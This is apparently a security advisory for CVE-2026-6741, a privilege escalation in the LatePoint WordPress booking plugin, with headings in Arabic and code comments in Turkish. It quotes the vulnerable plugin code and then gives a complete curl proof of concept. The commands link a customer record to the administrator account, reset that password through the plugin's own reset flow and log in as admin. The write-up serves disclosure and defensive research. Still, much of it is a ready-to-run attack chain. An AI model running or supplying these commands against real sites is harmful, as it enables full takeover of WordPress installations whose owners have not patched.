
CVE-2026-6741 هي ثغرة تصعيد امتيازات بدرجة خطورة CVSS 8.8 (عالية) تتطلب مصادقة (Agent+) في إضافة LatePoint – Calendar Booking Plugin
ثغرة CVE-2026-6741 هي ثغرة تصعيد صلاحيات (Privilege Escalation) بتقييم CVSS 8.8 (عالية) ومُوثَّقة (Authenticated Agent+) في إضافة LatePoint – Calendar Booking Plugin
الإضافة: LatePoint – Calendar Booking Plugin للمواعيد والفعاليات (
latepoint) معرّف CVE: CVE-2026-6741 درجة CVSS: 8.8 (عالية) ناقل CVSS:CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:Hنوع الثغرة: Authenticated (Agent+) Privilege Escalation → Administrator Takeover الإصدارات المتأثرة: <= 5.4.1 الإصدار المُصحَّح: 5.4.2 تاريخ النشر: 27 أبريل 2026 الباحثون: skyv3il (AI SAFE), Chirita Catalin-Andrei / CC99IE (UVT-CTF), AmonRa — Wordfence
يمكن لمهاجم مُوثَّق يمتلك دور latepoint_agent أن يربط أي سجل عميل (customer) في LatePoint بحساب مدير WordPress، ثم يستخدم تدفق إعادة تعيين كلمة المرور الخاص بـ LatePoint لتغيير كلمة مرور المدير.
يؤدي هذا إلى الاستيلاء الكامل على الموقع.
| الحقل | القيمة |
|---|---|
| اسم الإضافة | LatePoint – Calendar Booking Plugin |
| معرّف الإضافة (Slug) | latepoint |
| معرّف CVE | CVE-2026-6741 |
| درجة CVSS | 8.8 (عالية) |
| نوع الثغرة | Authenticated (Agent+) Privilege Escalation |
| الإصدار المتأثر | <= 5.4.1 |
| الإصدار المُصحَّح | 5.4.2 |
| المتطلب | دور latepoint_agent، WordPress 6.9+ |
أضافت LatePoint 5.3.0 دعم Abilities API القادمة مع WordPress 6.9+. تتيح هذه الواجهة للإضافات تسجيل فئات "الصلاحيات" (ability) التي يمكن استدعاؤها عبر REST API:
// latepoint.php (5.4.1, line 907)
if ( function_exists( 'wp_register_ability' ) ) {
include_once LATEPOINT_ABSPATH . 'lib/abilities/class-latepoint-abilities.php';
}
// lib/abilities/customers/connect-customer-to-wp-user.php — line 12
protected function configure(): void {
$this->id = 'latepoint/connect-customer-to-wp-user';
$this->label = __( 'Connect customer to WP user', 'latepoint' );
$this->permission = 'customer__edit'; // ← tek kontrol: bu capability
}
يمتلك دور Agent افتراضيًا صلاحية customer__edit:
// lib/helpers/roles_helper.php — line 401
public static function get_default_capabilities_list_for_agent_role() {
$capabilities = [
...
'customer__edit', // ← agent bu yetkiye sahip
...
];
}
// connect-customer-to-wp-user.php — lines 39–60
public function execute( array $args ) {
$customer = new OsCustomerModel( (int) $args['customer_id'] );
$wp_user_id = (int) $args['wp_user_id'];
if ( ! get_userdata( $wp_user_id ) ) {
// Sadece kullanıcının var olup olmadığı kontrol ediliyor
// EKSIK: Hedef kullanıcının rolü kontrol edilmiyor
return new WP_Error( 'wp_user_not_found', ... );
}
$customer->wordpress_user_id = $wp_user_id; // ← herhangi bir WP user'a bağla
$customer->save();
return $this->serialize_customer( ... );
}
// lib/models/customer_model.php — line 315
public function update_password( $password ) {
if ( OsAuthHelper::can_wp_users_login_as_customers()
&& $this->wordpress_user_id ) {
wp_set_password( $password, $this->wordpress_user_id );
// ↑ wordpress_user_id artık admin ID'si → admin şifresi değişir
}
}
// LatePointAbstractAbility — check_permission()
public function check_permission(): bool {
return OsRolesHelper::can_user( $this->permission );
// Sadece ÇAĞIRANIN yetkisini kontrol eder
// HEDEF kullanıcının rolünü kontrol etmez
}
latepoint_agent hesabı
│
▼
1. Agent olarak WP'ye giriş yap → REST nonce al
│
▼
2. Hedef admin WordPress user ID'sini tespit et
(wp-json/wp/v2/users veya ID=1)
│
▼
3. POST /wp-json/wp/v2/abilities/latepoint/connect-customer-to-wp-user
{ "customer_id": 5, "wp_user_id": 1 }
→ Rol kontrolü yok → Başarılı
│
▼
4. LatePoint forgot_password → customer emailine reset token gönder
│
▼
5. Token ile change_password → update_password() çağrılır
→ wp_set_password("Hacked!", 1)
→ Admin şifresi değişti
│
▼
6. Yeni şifreyle admin olarak giriş → Tam site kontrolü ✓
⚠️ إخلاء مسؤولية: يُقدَّم إثبات المفهوم (PoC) هذا لأغراض تعليمية ولأبحاث أمنية دفاعية فقط.
المتطلبات الأساسية:
latepoint_agentWP_URL="https://target.example.com"
AGENT_USER="agent_user"
AGENT_PASS="agent_password"
# Cookie tabanlı oturum aç
curl -c cookies.txt -b cookies.txt -s -X POST "$WP_URL/wp-login.php" \
-d "log=$AGENT_USER&pwd=$AGENT_PASS&wp-submit=Log+In&redirect_to=%2Fwp-admin%2F&testcookie=1" \
-H "Cookie: wordpress_test_cookie=WP+Cookie+check"
# REST nonce al
NONCE=$(curl -s -b cookies.txt \
"$WP_URL/wp-admin/admin-ajax.php?action=rest-nonce")
echo "Nonce: $NONCE"
# REST API ile admin kullanıcıları listele
curl -s "$WP_URL/wp-json/wp/v2/users?roles=administrator" \
-H "X-WP-Nonce: $NONCE" | python3 -m json.tool
ADMIN_WP_USER_ID=1 # Genellikle ID=1
CUSTOMER_ID=5 # Kontrol ettiğin LatePoint customer ID
curl -s -b cookies.txt -X POST \
"$WP_URL/wp-json/wp/v2/abilities/latepoint/connect-customer-to-wp-user" \
-H "Content-Type: application/json" \
-H "X-WP-Nonce: $NONCE" \
-d "{\"customer_id\": $CUSTOMER_ID, \"wp_user_id\": $ADMIN_WP_USER_ID}"
الاستجابة المتوقعة:
{
"id": 5,
"wp_user_id": 1,
"email": "[email protected]"
}
CUSTOMER_EMAIL="[email protected]"
curl -s -X POST \
"$WP_URL/?latepoint_route=customer_cabinet%2Fforgot_password" \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "password_reset_email=$CUSTOMER_EMAIL"
ترسل LatePoint رسالة إعادة تعيين تحتوي على رمز account_nonce إلى عنوان $CUSTOMER_EMAIL.
RESET_TOKEN="<emailden_alinan_token>"
NEW_PASSWORD="Attacker_Password123!"
curl -s -X POST \
"$WP_URL/?latepoint_route=customer_cabinet%2Fchange_password" \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "password_reset_token=$RESET_TOKEN&password=$NEW_PASSWORD&password_confirmation=$NEW_PASSWORD"
يُطلق هذا الاستدعاء سلسلة update_password() → wp_set_password($NEW_PASSWORD, 1). تم تغيير كلمة مرور المدير.
curl -c admin_cookies.txt -b admin_cookies.txt -s -X POST \
"$WP_URL/wp-login.php" \
-d "log=admin&pwd=$NEW_PASSWORD&wp-submit=Log+In&redirect_to=%2Fwp-admin%2F&testcookie=1" \
-H "Cookie: wordpress_test_cookie=WP+Cookie+check"
# wp-admin erişimi
curl -b admin_cookies.txt "$WP_URL/wp-admin/user-new.php"
# Beklenen: 200 OK (wp-login.php'ye yönlendirme değil)
# REST API ile rol doğrulama
ADMIN_NONCE=$(curl -s -b admin_cookies.txt \
"$WP_URL/wp-admin/admin-ajax.php?action=rest-nonce")
curl -s "$WP_URL/wp-json/wp/v2/users/me" \
-H "X-WP-Nonce: $ADMIN_NONCE" | python3 -m json.tool
# Beklenen: "roles": ["administrator"]
git clone https://github.com/kullanici/cve-2026-6741-scanner
cd cve-2026-6741-scanner
pip install -r requirements.txt
requirements.txt
requests